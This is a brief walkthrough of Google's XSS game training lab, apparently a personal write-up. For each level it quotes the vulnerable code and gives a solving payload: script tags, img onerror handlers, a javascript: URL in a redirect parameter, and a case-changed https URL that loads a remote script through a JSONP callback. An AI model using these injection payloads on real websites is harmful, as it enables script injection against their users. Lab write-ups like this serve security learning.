[1/6] Level 1: Hello, world of XSS
bug:
message = "Sorry, no results were found for <b>" + query + "</b>." message += " <a href='?'>Try again</a>." # Display the results page self.render_string(page_header + message + page_footer)
exp: <script>alert(/xss/)</script>
[2/6] Level 2: Persistence is key
bug:
html += "<blockquote>" + posts[i].message + "</blockquote"; ...... var message = document.getElementById('post-content').value;
exp:<img src=1 onerror=”alert(/xss/)”>
[3/6] Level 3: That sinking feeling…
bug:
html += "<img src='/static/level3/cloud" + num + ".jpg' />";
exp:https://xss-game.appspot.com/level3/frame#2xss’ onerror=”alert(/xss/)”
[4/6] Level 4: Context matters
bug:
<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />
[5/6] Level 5: Breaking protocol
bug: https://xss-game.appspot.com/level5/frame/signup?next=confirm
<a href="{{ next }}">Next >></a>
we can change the ‘next’ parameter.
exp:https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(/xss/)
then click go,and input email or everything
[6/6] Level 6: Follow the 🐇
bug: if (url.match(/^https?:\/\//)) {—————–bypass:t-T
scriptEl.src = url; // Show log messages scriptEl.onload = function() { setInnerText(document.getElementById("log"), "Loaded gadget from " + url); ...... // Take the value after # and use it as the gadget filename. function getGadgetName() { return window.location.hash.substr(1) || "/static/gadget.js"; } includeGadget(getGadgetName());
we can change the url to include our script
exp:https://xss-game.appspot.com/level6/frame#hTTps://www.google.com/jsapi?callback=alert
(If you use http,it will output Couldn’t load gadget from …….,because it must use https,so you should use a https’s website to include your evil script,I think it is very very sly.)
Colorful egg:
